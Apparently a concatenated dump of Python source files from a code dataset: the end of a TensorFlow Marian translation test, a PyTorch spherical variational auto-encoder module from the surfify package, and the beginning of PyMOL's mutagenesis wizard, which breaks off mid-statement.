# check that the resized embeddings size matches the desired size.
assert_size = size if size is not None else config.vocab_size
self.assertEqual(new_input_embeddings.shape[0], assert_size)
# check that weights remain the same after resizing
models_equal = True
for p1, p2 in zip(old_input_embeddings.value(), new_input_embeddings.value()):
if tf.math.reduce_sum(tf.math.abs(p1 - p2)) > 0:
models_equal = False
self.assertTrue(models_equal)
if old_output_embeddings is not None and new_output_embeddings is not None:
self.assertEqual(new_output_embeddings.shape[0], assert_size)
models_equal = True
for p1, p2 in zip(old_output_embeddings.value(), new_output_embeddings.value()):
if tf.math.reduce_sum(tf.math.abs(p1 - p2)) > 0:
models_equal = False
self.assertTrue(models_equal)
if old_final_logits_bias is not None and new_final_logits_bias is not None:
old_final_logits_bias = old_final_logits_bias["final_logits_bias"]
new_final_logits_bias = new_final_logits_bias["final_logits_bias"]
self.assertEqual(new_final_logits_bias.shape[0], 1)
self.assertEqual(new_final_logits_bias.shape[1], assert_size)
models_equal = True
for old, new in zip(old_final_logits_bias.value(), new_final_logits_bias.value()):
for p1, p2 in zip(old, new):
if tf.math.reduce_sum(tf.math.abs(p1 - p2)) > 0:
models_equal = False
self.assertTrue(models_equal)
def _assert_tensors_equal(a, b, atol=1e-12, prefix=""):
"""If tensors not close, or a and b arent both tensors, raise a nice Assertion error."""
if a is None and b is None:
return True
try:
if tf.debugging.assert_near(a, b, atol=atol):
return True
raise
except Exception:
msg = "{} != {}".format(a, b)
if prefix:
msg = prefix + ": " + msg
raise AssertionError(msg)
def _long_tensor(tok_lst):
return tf.constant(tok_lst, dtype=tf.int32)
class AbstractMarianIntegrationTest(unittest.TestCase):
maxDiff = 1000 # show more chars for failing integration tests
@classmethod
def setUpClass(cls) -> None:
cls.model_name = f"Helsinki-NLP/opus-mt-{cls.src}-{cls.tgt}"
return cls
@cached_property
def tokenizer(self) -> MarianTokenizer:
return AutoTokenizer.from_pretrained(self.model_name)
@property
def eos_token_id(self) -> int:
return self.tokenizer.eos_token_id
@cached_property
def model(self):
warnings.simplefilter("error")
model: TFMarianMTModel = TFAutoModelForSeq2SeqLM.from_pretrained(self.model_name, from_pt=True)
assert isinstance(model, TFMarianMTModel)
c = model.config
self.assertListEqual(c.bad_words_ids, [[c.pad_token_id]])
self.assertEqual(c.max_length, 512)
self.assertEqual(c.decoder_start_token_id, c.pad_token_id)
return model
def _assert_generated_batch_equal_expected(self, **tokenizer_kwargs):
generated_words = self.translate_src_text(**tokenizer_kwargs)
self.assertListEqual(self.expected_text, generated_words)
def translate_src_text(self, **tokenizer_kwargs):
model_inputs = self.tokenizer.prepare_seq2seq_batch(
src_texts=self.src_text, **tokenizer_kwargs, return_tensors="tf"
)
generated_ids = self.model.generate(
model_inputs.input_ids, attention_mask=model_inputs.attention_mask, num_beams=2, max_length=128
)
generated_words = self.tokenizer.batch_decode(generated_ids.numpy(), skip_special_tokens=True)
return generated_words
@require_sentencepiece
@require_tokenizers
class TestMarian_MT_EN(AbstractMarianIntegrationTest):
"""Cover low resource/high perplexity setting. This breaks if pad_token_id logits not set to LARGE_NEGATIVE."""
src = "mt"
tgt = "en"
src_text = ["Billi messu b'mod ġentili, Ġesù fejjaq raġel li kien milqut bil - marda kerha tal - ġdiem."]
expected_text = ["Touching gently, Jesus healed a man who was affected by the sad disease of leprosy."]
@slow
def test_batch_generation_mt_en(self):
self._assert_generated_batch_equal_expected()
@require_sentencepiece
@require_tokenizers
class TestMarian_en_zh(AbstractMarianIntegrationTest):
src = "en"
tgt = "zh"
src_text = ["My name is Wolfgang and I live in Berlin"]
expected_text = ["我叫沃尔夫冈 我住在柏林"]
@slow
def test_batch_generation_en_zh(self):
self._assert_generated_batch_equal_expected()
@require_sentencepiece
@require_tokenizers
class TestMarian_en_ROMANCE(AbstractMarianIntegrationTest):
"""Multilingual on target side."""
src = "en"
tgt = "ROMANCE"
src_text = [
">>fr<< Don't spend so much time watching TV.",
">>pt<< Your message has been sent.",
">>es<< He's two years older than me.",
]
expected_text = [
"Ne passez pas autant de temps à regarder la télé.",
"A sua mensagem foi enviada.",
"Es dos años más viejo que yo.",
]
@slow
def test_batch_generation_en_ROMANCE_multi(self):
self._assert_generated_batch_equal_expected()
@slow
def test_pipeline(self):
pipeline = TranslationPipeline(self.model, self.tokenizer, framework="tf")
output = pipeline(self.src_text)
self.assertEqual(self.expected_text, [x["translation_text"] for x in output])
| 39.875576 | 117 | 0.672946 |
1eadc6039d05c5d5b5b3a2eae61bdf65e1e82afb | 21,452 | py | Python | surfify/models/vae.py | neurospin-deepinsight/surfify | 68ba674c20e759ee9c56acbd4a1a44781d35a68c | [
"CECILL-B"
] | 2 | 2021-12-17T10:14:31.000Z | 2022-01-24T17:17:01.000Z | surfify/models/vae.py | neurospin-deepinsight/surfify | 68ba674c20e759ee9c56acbd4a1a44781d35a68c | [
"CECILL-B"
] | null | null | null | surfify/models/vae.py | neurospin-deepinsight/surfify | 68ba674c20e759ee9c56acbd4a1a44781d35a68c | [
"CECILL-B"
] | 3 | 2021-09-16T08:26:19.000Z | 2022-01-23T18:31:50.000Z | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2021
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
Cortical Spherical Variational Auto-Encoder (GMVAE) models.
[1] Representation Learning of Resting State fMRI with Variational
Autoencoder: https://github.com/libilab/rsfMRI-VAE
"""
# Imports
import torch
import torch.nn as nn
from torch.distributions import Normal
from ..utils import get_logger, debug_msg
from ..nn import IcoUpConv, IcoPool, IcoSpMaConv, IcoSpMaConvTranspose
from .base import SphericalBase
# Global parameters
logger = get_logger()
class SphericalVAE(SphericalBase):
""" Spherical VAE architecture.
Use either RePa - Rectangular Patch convolution method or DiNe - Direct
Neighbor convolution method.
Notes
-----
Debuging messages can be displayed by changing the log level using
``setup_logging(level='debug')``.
See Also
--------
SphericalGVAE
References
----------
Representation Learning of Resting State fMRI with Variational
Autoencoder, NeuroImage 2021.
Examples
--------
>>> import torch
>>> from surfify.utils import icosahedron
>>> from surfify.models import SphericalVAE
>>> verts, tris = icosahedron(order=6)
>>> x = torch.zeros((1, 2, len(verts)))
>>> model = SphericalVAE(
>>> input_channels=2, input_order=6, latent_dim=64,
>>> conv_flts=[32, 32, 64, 64], conv_mode="DiNe", dine_size=1,
>>> fusion_level=2, standard_ico=False")
>>> print(model)
>>> out = model(x, x)
>>> print(out[0].shape, out[1].shape)
"""
def __init__(self, input_channels=1, input_order=5, latent_dim=64,
conv_flts=[32, 32, 64, 64], conv_mode="DiNe", dine_size=1,
repa_size=5, repa_zoom=5, dynamic_repa_zoom=False,
fusion_level=1, standard_ico=False, cachedir=None):
""" Init class.
Parameters
----------
input_channels: int, default 1
the number of input channels.
input_order: int, default 5
the input icosahedron order.
latent_dim: int, default 64
the size of the stochastic latent state of the SVAE.
conv_flts: list of int
the size of convolutional filters.
conv_mode: str, default 'DiNe'
use either 'RePa' - Rectangular Patch convolution method or 'DiNe'
- 1 ring Direct Neighbor convolution method.
dine_size: int, default 1
the size of the spherical convolution filter, ie. the number of
neighbor rings to be considered.
repa_size: int, default 5
the size of the rectangular grid in the tangent space.
repa_zoom: int, default 5
control the rectangular grid spacing in the tangent space by
applying a multiplicative factor of `1 / repa_zoom`.
dynamic_repa_zoom: bool, default False
dynamically adapt the RePa zoom by applying a multiplicative factor
of `log(order + 1) + 1`.
fusion_level: int, default 1
at which max pooling level left and right hemisphere data
are concatenated.
standard_ico: bool, default False
optionaly use surfify tesselation.
cachedir: str, default None
set this folder to use smart caching speedup.
"""
logger.debug("SphericalVAE init...")
super(SphericalVAE, self).__init__(
input_order=input_order, n_layers=len(conv_flts),
conv_mode=conv_mode, dine_size=dine_size, repa_size=repa_size,
repa_zoom=repa_zoom, dynamic_repa_zoom=dynamic_repa_zoom,
standard_ico=standard_ico, cachedir=cachedir)
self.input_channels = input_channels
self.latent_dim = latent_dim
self.conv_flts = conv_flts
self.top_flatten_dim = len(
self.ico[self.input_order - self.n_layers + 1].vertices)
self.top_final = self.conv_flts[-1] * self.top_flatten_dim
if fusion_level > self.n_layers or fusion_level <= 0:
raise ValueError("Impossible to use input fusion level with "
"'{0}' layers.".format(self.n_layers))
self.fusion_level = fusion_level
# define the encoder
self.enc_left_conv = nn.Sequential()
self.enc_right_conv = nn.Sequential()
self.enc_w_conv = nn.Sequential()
multi_path = True
input_channels = self.input_channels
for idx in range(self.n_layers):
order = self.input_order - idx
if idx == self.fusion_level:
multi_path = False
input_channels *= 2
if idx != 0:
pooling = IcoPool(
down_neigh_indices=self.ico[order + 1].neighbor_indices,
down_indices=self.ico[order + 1].down_indices,
pooling_type="mean")
if idx != 0 and multi_path:
self.enc_left_conv.add_module("pooling_{0}".format(idx),
pooling)
self.enc_right_conv.add_module("pooling_{0}".format(idx),
pooling)
elif idx != 0:
self.enc_w_conv.add_module("pooling_{0}".format(idx), pooling)
if multi_path:
output_channels = int(self.conv_flts[idx] / 2)
lconv = self.sconv(
input_channels, output_channels,
self.ico[order].conv_neighbor_indices)
self.enc_left_conv.add_module("l_enc_{0}".format(idx), lconv)
rconv = self.sconv(
input_channels, output_channels,
self.ico[order].conv_neighbor_indices)
self.enc_right_conv.add_module("r_enc_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = self.sconv(
input_channels, self.conv_flts[idx],
self.ico[order].conv_neighbor_indices)
self.enc_w_conv.add_module("enc_{0}".format(idx), conv)
input_channels = self.conv_flts[idx]
self.enc_w_dense = nn.Linear(self.top_final, self.latent_dim * 2)
# define the decoder
self.dec_w_dense = nn.Linear(self.latent_dim, self.top_final)
self.dec_w_conv = nn.Sequential()
self.dec_left_conv = nn.Sequential()
self.dec_right_conv = nn.Sequential()
input_channels = self.conv_flts[self.n_layers - 1]
if self.fusion_level == self.n_layers:
multi_path = True
input_channels = int(input_channels / 2)
else:
multi_path = False
for idx in range(self.n_layers - 1, -1, -1):
if multi_path:
if idx == 0:
output_channels = self.input_channels
else:
output_channels = int(self.conv_flts[idx - 1] / 2)
lconv = IcoUpConv(
in_feats=input_channels, out_feats=output_channels,
up_neigh_indices=self.ico[order].neighbor_indices,
down_indices=self.ico[order].down_indices)
self.dec_left_conv.add_module("l_dec_{0}".format(idx), lconv)
rconv = IcoUpConv(
in_feats=input_channels, out_feats=output_channels,
up_neigh_indices=self.ico[order].neighbor_indices,
down_indices=self.ico[order].down_indices)
self.dec_right_conv.add_module("r_dec_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = IcoUpConv(
in_feats=input_channels, out_feats=self.conv_flts[idx - 1],
up_neigh_indices=self.ico[order + 1].neighbor_indices,
down_indices=self.ico[order + 1].down_indices)
self.dec_w_conv.add_module("dec_{0}".format(idx), conv)
input_channels = self.conv_flts[idx - 1]
if idx == self.fusion_level:
multi_path = True
input_channels = int(input_channels / 2)
order += 1
self.relu = nn.ReLU(inplace=True)
def encode(self, left_x, right_x):
""" The encoder.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
q(z | x): Normal (batch_size, <latent_dim>)
a Normal distribution.
"""
left_x = self._safe_forward(self.enc_left_conv, left_x,
act=self.relu, skip_last_act=True)
right_x = self._safe_forward(self.enc_right_conv, right_x,
act=self.relu, skip_last_act=True)
x = torch.cat((left_x, right_x), dim=1)
x = self.relu(x)
x = self._safe_forward(self.enc_w_conv, x, act=self.relu)
x = x.reshape(-1, self.top_final)
x = self.enc_w_dense(x)
z_mu, z_logvar = torch.chunk(x, chunks=2, dim=1)
return Normal(loc=z_mu, scale=z_logvar.exp().pow(0.5))
def decode(self, z):
""" The decoder.
Parameters
----------
z: Tensor (samples, <latent_dim>)
the stochastic latent state z.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
x = self.relu(self.dec_w_dense(z))
x = x.view(-1, self.conv_flts[-1], self.top_flatten_dim)
x = self._safe_forward(self.dec_w_conv, x, act=self.relu)
left_recon_x, right_recon_x = torch.chunk(x, chunks=2, dim=1)
left_recon_x = self._safe_forward(self.dec_left_conv, left_recon_x,
act=self.relu, skip_last_act=True)
right_recon_x = self._safe_forward(self.dec_right_conv, right_recon_x,
act=self.relu, skip_last_act=True)
return left_recon_x, right_recon_x
def reparameterize(self, q):
""" Implement the reparametrization trick.
"""
if self.training:
z = q.rsample()
else:
z = q.loc
return z
def forward(self, left_x, right_x):
""" The forward method.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
logger.debug("SphericalVAE forward pass")
logger.debug(debug_msg("left cortical", left_x))
logger.debug(debug_msg("right cortical", right_x))
q = self.encode(left_x, right_x)
logger.debug(debug_msg("posterior loc", q.loc))
logger.debug(debug_msg("posterior scale", q.scale))
z = self.reparameterize(q)
logger.debug(debug_msg("z", z))
left_recon_x, right_recon_x = self.decode(z)
logger.debug(debug_msg("left recon cortical", left_recon_x))
logger.debug(debug_msg("right recon cortical", right_recon_x))
return left_recon_x, right_recon_x, {"q": q, "z": z}
class SphericalGVAE(nn.Module):
""" Spherical Grided VAE architecture.
Use SpMa - Spherical Mapping convolution method.
Notes
-----
Debuging messages can be displayed by changing the log level using
``setup_logging(level='debug')``.
See Also
--------
SphericalVAE
References
----------
Representation Learning of Resting State fMRI with Variational
Autoencoder, NeuroImage 2021.
Examples
--------
>>> import torch
>>> from surfify.models import SphericalGVAE
>>> x = torch.zeros((1, 2, 192, 192))
>>> model = SphericalGVAE(
>>> input_channels=2, input_dim=192, latent_dim=64,
>>> conv_flts=[64, 128, 128, 256, 256], fusion_level=2)
>>> print(model)
>>> out = model(x, x)
>>> print(out[0].shape, out[1].shape)
"""
def __init__(self, input_channels=1, input_dim=192, latent_dim=64,
conv_flts=[64, 128, 128, 256, 256], fusion_level=1):
""" Init class.
Parameters
----------
input_channels: int, default 1
the number of input channels.
input_dim: int, default 192
the size of the converted 3-D surface to the 2-D grid.
latent_dim: int, default 64
the size of the stochastic latent state of the SVAE.
conv_flts: list of int
the size of convolutional filters.
fusion_level: int, default 1
at which max pooling level left and right hemisphere data
are concatenated.
"""
logger.debug("SphericalGVAE init...")
super(SphericalGVAE, self).__init__()
self.input_channels = input_channels
self.input_dim = input_dim
self.latent_dim = latent_dim
self.conv_flts = conv_flts
self.n_layers = len(self.conv_flts)
self.top_flatten_dim = int(self.input_dim / (2 ** self.n_layers))
self.top_final = self.conv_flts[-1] * self.top_flatten_dim ** 2
if fusion_level > self.n_layers or fusion_level <= 0:
raise ValueError("Impossible to use input fusion level with "
"'{0}' layers.".format(self.n_layers))
self.fusion_level = fusion_level
# define the encoder
self.enc_left_conv = nn.Sequential()
self.enc_right_conv = nn.Sequential()
self.enc_w_conv = nn.Sequential()
multi_path = True
input_channels = self.input_channels
for idx in range(self.n_layers):
if idx == self.fusion_level:
multi_path = False
input_channels *= 2
if multi_path:
output_channels = int(self.conv_flts[idx] / 2)
if idx == 0:
kernel_size = 8
pad = 3
else:
kernel_size = 4
pad = 1
lconv = IcoSpMaConv(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad)
self.enc_left_conv.add_module("l_enc_{0}".format(idx), lconv)
rconv = IcoSpMaConv(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad)
self.enc_right_conv.add_module("r_enc_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = IcoSpMaConv(
input_channels, self.conv_flts[idx], kernel_size=4,
stride=2, pad=1)
self.enc_w_conv.add_module("enc_{0}".format(idx), conv)
input_channels = self.conv_flts[idx]
self.enc_w_dense = nn.Linear(self.top_final, self.latent_dim * 2)
# define the decoder
self.dec_w_dense = nn.Linear(self.latent_dim, self.top_final)
self.dec_w_conv = nn.Sequential()
self.dec_left_conv = nn.Sequential()
self.dec_right_conv = nn.Sequential()
input_channels = self.conv_flts[self.n_layers - 1]
if self.fusion_level == self.n_layers:
multi_path = True
input_channels = int(input_channels / 2)
else:
multi_path = False
for idx in range(self.n_layers - 1, -1, -1):
if multi_path:
if idx == 0:
kernel_size = 8
pad = 3
zero_pad = 9
output_channels = self.input_channels
else:
kernel_size = 4
pad = 1
zero_pad = 3
output_channels = int(self.conv_flts[idx - 1] / 2)
lconv = IcoSpMaConvTranspose(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad,
zero_pad=zero_pad)
self.dec_left_conv.add_module("l_dec_{0}".format(idx), lconv)
rconv = IcoSpMaConvTranspose(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad,
zero_pad=zero_pad)
self.dec_right_conv.add_module("r_dec_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = IcoSpMaConvTranspose(
in_feats=input_channels, out_feats=self.conv_flts[idx - 1],
kernel_size=4, stride=2, pad=1, zero_pad=3)
self.dec_w_conv.add_module("dec_{0}".format(idx), conv)
input_channels = self.conv_flts[idx - 1]
if idx == self.fusion_level:
multi_path = True
input_channels = int(input_channels / 2)
self.relu = nn.ReLU(inplace=True)
def encode(self, left_x, right_x):
""" The encoder.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
q(z | x): Normal (batch_size, <latent_dim>)
a Normal distribution.
"""
left_x = self.enc_left_conv(left_x)
right_x = self.enc_right_conv(right_x)
x = torch.cat((left_x, right_x), dim=1)
x = self.relu(x)
for mod in self.enc_w_conv.children():
x = self.relu(mod(x))
x = x.view(-1, self.top_final)
x = self.enc_w_dense(x)
z_mu, z_logvar = torch.chunk(x, chunks=2, dim=1)
return Normal(loc=z_mu, scale=z_logvar.exp().pow(0.5))
def decode(self, z):
""" The decoder.
Parameters
----------
z: Tensor (samples, <latent_dim>)
the stochastic latent state z.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
x = self.relu(self.dec_w_dense(z))
x = x.view(-1, self.conv_flts[-1], self.top_flatten_dim,
self.top_flatten_dim)
for mod in self.dec_w_conv.children():
x = self.relu(mod(x))
left_recon_x, right_recon_x = torch.chunk(x, chunks=2, dim=1)
left_recon_x = self.dec_left_conv(left_recon_x)
right_recon_x = self.dec_right_conv(right_recon_x)
return left_recon_x, right_recon_x
def reparameterize(self, q):
""" Implement the reparametrization trick.
"""
if self.training:
z = q.rsample()
else:
z = q.loc
return z
def forward(self, left_x, right_x):
""" The forward method.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
logger.debug("SphericalGVAE forward pass")
logger.debug(debug_msg("left cortical", left_x))
logger.debug(debug_msg("right cortical", right_x))
q = self.encode(left_x, right_x)
logger.debug(debug_msg("posterior loc", q.loc))
logger.debug(debug_msg("posterior scale", q.scale))
z = self.reparameterize(q)
logger.debug(debug_msg("z", z))
left_recon_x, right_recon_x = self.decode(z)
logger.debug(debug_msg("left recon cortical", left_recon_x))
logger.debug(debug_msg("right recon cortical", right_recon_x))
return left_recon_x, right_recon_x, {"q": q, "z": z}
| 40.628788 | 79 | 0.578827 |
e140f6ee5f31c1a4218ea968fc90d4cc71d735e8 | 29,307 | py | Python | modules/pymol/wizard/mutagenesis.py | Biondilbiondo/pymol-open-source | 65232aa82f46b453cddef492d6d90cd255dcb5aa | [
"CNRI-Python"
] | null | null | null | modules/pymol/wizard/mutagenesis.py | Biondilbiondo/pymol-open-source | 65232aa82f46b453cddef492d6d90cd255dcb5aa | [
"CNRI-Python"
] | null | null | null | modules/pymol/wizard/mutagenesis.py | Biondilbiondo/pymol-open-source | 65232aa82f46b453cddef492d6d90cd255dcb5aa | [
"CNRI-Python"
] | null | null | null |
from __future__ import print_function
from pymol.wizard import Wizard
from pymol import cmd,editor
from chempy import io
from copy import deepcopy
import pymol
import os
import traceback
src_sele = "_mutate_sel"
bump_name = "_bump_check"
obj_name = "mutation"
frag_name = "_tmp_mut"
mut_sele = "_tmp_mut_sele"
tmp_obj2 = "_tmp_obj2"
tmp_sele1 = "_tmp_sele1"
tmp_sele2 = "_tmp_sele2"
tmp_hbonds = "_tmp_hbonds"
default_mode = "current"
default_rep = "lines"
default_hyd = 'auto'
default_dep = 'dep'
default_n_cap = 'none'
default_c_cap = 'none'
_rot_type_xref = {
'GLUH' : 'GLU',
'ASPH' : 'ASP',
'ARGN' : 'ARG',
'LYSN' : 'LYS',
'HIP' : 'HIS',
'HID' : 'HIS',
'HIP' : 'HIS'
}
class Mutagenesis(Wizard):
count = 0
cutoff = 3.5
def __init__(self,_self=cmd):
Wizard.__init__(self,_self)
cmd=self.cmd
if self.cmd.get_movie_length() > 0:
raise pymol.wizarding.WizardError('Mutagenesis Wizard cannot be used with Movie')
cmd.unpick()
self.stored = pymol.Scratch_Storage()
self.space = {'stored': self.stored}
self.bump_scores = []
self.dep = default_dep
self.ind_library = io.pkl.fromFile(os.environ['PYMOL_DATA']+
"/chempy/sidechains/sc_bb_ind.pkl")
self.load_library()
self.status = 0 # 0 no selection, 1 mutagenizing
self.bump_check = 1
self.auto_center = 1
self.error = None
self.object_name = None
self.modes = [
'current'
]
self.mode = default_mode
self.rep = default_rep
self.hyd = default_hyd
self.n_cap = default_n_cap
self.c_cap = default_c_cap
residues = list(self.ind_library.keys())
# could extent with additional fragments manually as below
residues.extend(['GLY','ALA'])
residues.extend(['HID','HIE','HIP'])
residues.extend(['ARGN','LYSN','ASPH','GLUH'])
residues.sort()
res_copy = deepcopy(residues)
for a in res_copy:
residues.append('NT_'+a)
residues.append('CT_'+a)
self.modes.extend(residues)
self.mode_label={}
for a in self.modes:
self.mode_label[a] = ""+a
self.mode_label['current']="No Mutant"
self.selection_mode = cmd.get_setting_int("mouse_selection_mode")
cmd.set("mouse_selection_mode",1)
smm = []
smm.append([ 2, 'Mutant', '' ])
smm.append([ 1, 'No change', 'cmd.get_wizard().set_mode("current")' ])
# smm.append([ 1, 'N-Term', [] ])
# smm.append([ 1, 'C-Term', [] ])
smm.append([ 0, '', '' ])
for a in self.modes:
if a == 'current':
pass
elif a[0:3]=='NT_':
pass
# smm[2][2].append([ 1, self.mode_label[a[3:]], 'cmd.get_wizard().set_mode("'+a+'")'])
elif a[0:3]=='CT_':
pass
# smm[3][2].append([ 1, self.mode_label[a[3:]], 'cmd.get_wizard().set_mode("'+a+'")'])
else:
smm.append([ 1, self.mode_label[a], 'cmd.get_wizard().set_mode("'+a+'")'])
# group arg, lys, his, glu, asp
for lst in [ smm ]: # [ smm, smm[2][2], smm[3][2] ]:
for a in 'ARG','LYS','HID','GLU','ASP':
ix = 0
start = 0
stop = 0
for b in lst:
if start==0:
if b[1][0:]==a:
start = ix
stop = ix + 1
elif b[1][0:3]==a[0:3] or ( b[1][0:2]==a[0:2] and a[0:2]=='HI' ):
stop = ix + 1
ix = ix + 1
if start!=0 and stop!=0:
slice = lst[start:stop]
if a != 'HID':
slice2 = [slice[0] ] + [ [0,'',''] ] + slice[1:]
lst[start:stop] = [ [1, self.mode_label[a] + "... " , slice2 ] ]
else:
slice2 = [ slice[3] ] + [ [0,'',''] ] + slice[0:3]
lst[start:stop] = [ [1, self.mode_label['HIS']+ "... ", slice2 ] ]
self.menu['mode']=smm
self.reps = [
'lines',
'sticks',
'spheres',
'dots'
]
self.rep_name = {
'lines' : "Show Lines",
'sticks' : "Show Sticks",
'spheres' : "Show Spheres",
'dots' : "Show Dots",
}
self.dep_name = {
'dep' : "Backbone Depen. Rotamers",
'ind' : "Backbone Indep. Rotamers"
}
self.hyd_name = {
'auto' : "Hydrogens: Current",
'keep' : "Hydrogens: Add & Retain",
# 'polar' : "Polar Hydrogens",
'none' : "Hydrogens: Remove",
}
self.hyds = [ 'auto', 'keep', 'none' ]
self.n_cap_name = {
'none' : 'Open',
'posi' : 'NH3+',
'acet' : 'Acetyl',
}
self.n_caps = [ 'none', 'posi', 'acet' ]
self.c_cap_name = {
'none' : 'Open',
'nega' : 'COO-',
'amin' : 'Amine',
'nmet' : 'N-methyl',
}
self.c_caps = [ 'none', 'nega', 'amin', 'nmet' ]
smm = []
smm.append([ 2, 'N-Cap', '' ])
for a in self.n_caps:
smm.append([ 1, self.n_cap_name[a], 'cmd.get_wizard().set_n_cap("'+a+'")'])
self.menu['n_cap']=smm
smm = []
smm.append([ 2, 'C-Cap', '' ])
for a in self.c_caps:
smm.append([ 1, self.c_cap_name[a], 'cmd.get_wizard().set_c_cap("'+a+'")'])
self.menu['c_cap']=smm
smm = []
smm.append([ 2, 'Hydrogens', '' ])
for a in self.hyds:
smm.append([ 1, self.hyd_name[a], 'cmd.get_wizard().set_hyd("'+a+'")'])
self.menu['hyd']=smm
smm = []
smm.append([ 2, 'Representation', '' ])
for a in self.reps:
smm.append([ 1, self.rep_name[a], 'cmd.get_wizard().set_rep("'+a+'")'])
self.menu['rep']=smm
self.deps = [ 'dep', 'ind' ]
smm = []
smm.append([ 2, 'Rotamers', '' ])
for a in self.deps:
smm.append([ 1, self.dep_name[a], 'cmd.get_wizard().set_dep("'+a+'")'])
self.menu['dep']=smm
if 'pk1' in cmd.get_names('selections'):
cmd.select(src_sele,"(byres pk1)")
cmd.unpick()
cmd.enable(src_sele)
self.status = 1
self.error = None
self.do_library()
cmd.refresh_wizard()
def load_library(self):
if self.dep == 'dep':
if not hasattr(self,'dep_library'):
self.dep_library = io.pkl.fromFile(os.environ['PYMOL_DATA']+
"/chempy/sidechains/sc_bb_dep.pkl")
def set_mode(self,mode):
cmd=self.cmd
if mode in self.modes:
self.mode = mode
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_rep(self,rep):
cmd=self.cmd
if rep in self.reps:
self.rep=rep
cmd.hide("("+obj_name+")")
cmd.show('lines',obj_name) # always show lines
cmd.show(self.rep,obj_name)
cmd.refresh_wizard()
def set_c_cap(self,c_cap):
cmd=self.cmd
if c_cap in self.c_caps:
self.c_cap=c_cap
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_n_cap(self,n_cap):
cmd=self.cmd
if n_cap in self.n_caps:
self.n_cap=n_cap
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_hyd(self,hyd):
cmd=self.cmd
if hyd in self.hyds:
self.hyd=hyd
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_dep(self,value):
cmd=self.cmd
if value!=self.dep:
self.dep = value
self.load_library()
if src_sele in cmd.get_names("all"):
self.do_library()
cmd.refresh_wizard()
def get_panel(self):
cmd=self.cmd
if int(cmd.get("mouse_selection_mode")!=1):
cmd.set("mouse_selection_mode",1)
if self.mode == 'current':
label = 'No Mutation'
else:
label = 'Mutate to '+self.mode_label[self.mode]
return [
[ 1, 'Mutagenesis',''],
[ 3, label,'mode'],
[ 3, 'N-Cap: '+self.n_cap_name[self.n_cap],'n_cap'],
[ 3, 'C-Cap: '+self.c_cap_name[self.c_cap],'c_cap'],
[ 3, self.hyd_name[self.hyd],'hyd'],
[ 3, self.rep_name[self.rep],'rep'],
[ 3, self.dep_name[self.dep],'dep'],
[ 2, 'Apply' , 'cmd.get_wizard().apply()'],
[ 2, 'Clear' , 'cmd.get_wizard().clear()'],
[ 2, 'Done','cmd.set_wizard()'],
]
def get_event_mask(self):
return Wizard.event_mask_pick + Wizard.event_mask_select + Wizard.event_mask_state
def cleanup(self):
cmd=self.cmd
global default_mode,default_rep,default_dep,default_hyd
global default_n_cap, default_c_cap
default_mode = self.mode
default_rep = self.rep
default_dep = self.dep
default_hyd = self.hyd
default_n_cap = self.n_cap
default_c_cap = self.c_cap
cmd.set("mouse_selection_mode",self.selection_mode) # restore selection mode
self.clear()
def clear(self):
cmd=self.cmd
self.status=0
self.bump_scores = []
cmd.delete(tmp_hbonds)
cmd.delete(tmp_obj2)
cmd.delete(mut_sele)
cmd.delete(src_sele)
cmd.delete(obj_name)
cmd.delete(bump_name)
cmd.delete("_seeker_hilight")
cmd.refresh_wizard()
def apply(self):
cmd=self.cmd
if self.status==1:
# find the name of the object which contains the selection
src_frame = cmd.get_state()
try:
new_name = cmd.get_object_list(src_sele)[0]
except IndexError:
print(" Mutagenesis: object not found.")
return
if True:
auto_zoom = cmd.get_setting_text('auto_zoom')
cmd.set('auto_zoom',"0",quiet=1)
if self.lib_mode!="current":
# create copy with mutant in correct frame
state = cmd.get_object_state(new_name)
cmd.create(tmp_obj2, obj_name, src_frame, state)
cmd.set_title(tmp_obj2, state, '')
cmd.color(self.stored.identifiers[4], "?%s & elem C" % tmp_obj2)
cmd.alter(tmp_obj2, 'ID = -1')
# select backbone connection atoms
cmd.select(tmp_sele1, 'neighbor ?%s' % (src_sele), 0)
# remove residue and neighboring c-cap/n-cap (if any)
cmd.remove("?%s | byres (?%s & "
